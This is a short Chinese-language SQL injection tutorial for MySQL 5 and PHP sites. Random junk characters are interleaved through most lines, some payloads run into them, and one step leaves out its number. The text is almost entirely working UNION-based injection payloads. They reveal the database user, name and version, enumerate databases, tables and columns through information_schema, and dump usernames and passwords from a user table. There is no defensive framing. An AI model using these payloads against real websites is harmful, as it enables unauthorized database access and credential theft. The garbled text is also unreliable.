8 | W9 O" z h6 F' j教程内容:Mysql 5+php 注入
, O4 p; K! [7 i9 {( |6 R8 X) F6 w! d3 i' i8 E: x" q
: p) {3 l2 P$ i
1 m- J# z5 r$ T) ~
一.查看MYSQL基本信息(库名,版本,用户)
& s- R# |1 N7 v0 s/ E- i( ]2 o
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
) C- q* g# m) g8 @* D% E
0 J7 Z; t% H+ B/ a3 p- k% s二.查数据库6 }. _/ V8 N7 W2 w
7 R" v. t. k: Qand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*6 C. Q6 @& J# X; _! l2 U% ^
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
, V2 A& Z7 z& }% n' J
5 _. K- t g8 a2 |* g' U5 z三.暴表
. ? f+ Z; r5 K4 L* d$ ~3 G, U) d
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*$ s) g a$ {0 s& y* I7 P- J3 E/ z& l
2 ~; R% z9 V* plimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。0 R; o" |/ l- n4 U- A
1 x' s$ X; {0 P: M0 |, X2 ?' p四.暴字段
! N7 A m+ E' z6 s _3 h
7 v3 s+ h4 r5 ~' C) Aand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*5 m5 K+ K% W! r. {
2 p$ t! R: Q$ |3 ~% ~1 K% m) vlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
! d1 ]- G8 p% Z; k: q4 y8 x9 y: x. J! u
五.暴数据( q9 N" Z5 J, e ~& c7 [: F
2 |, ]' [5 O$ A1 z" F* vand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*8 x) d. f) w# ^; O Z0 m' t
7 n' l' g) X2 M% B- ]+ q; n' |+ b9 Y: @) M* }# K
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
6 k+ O- L2 C% Q |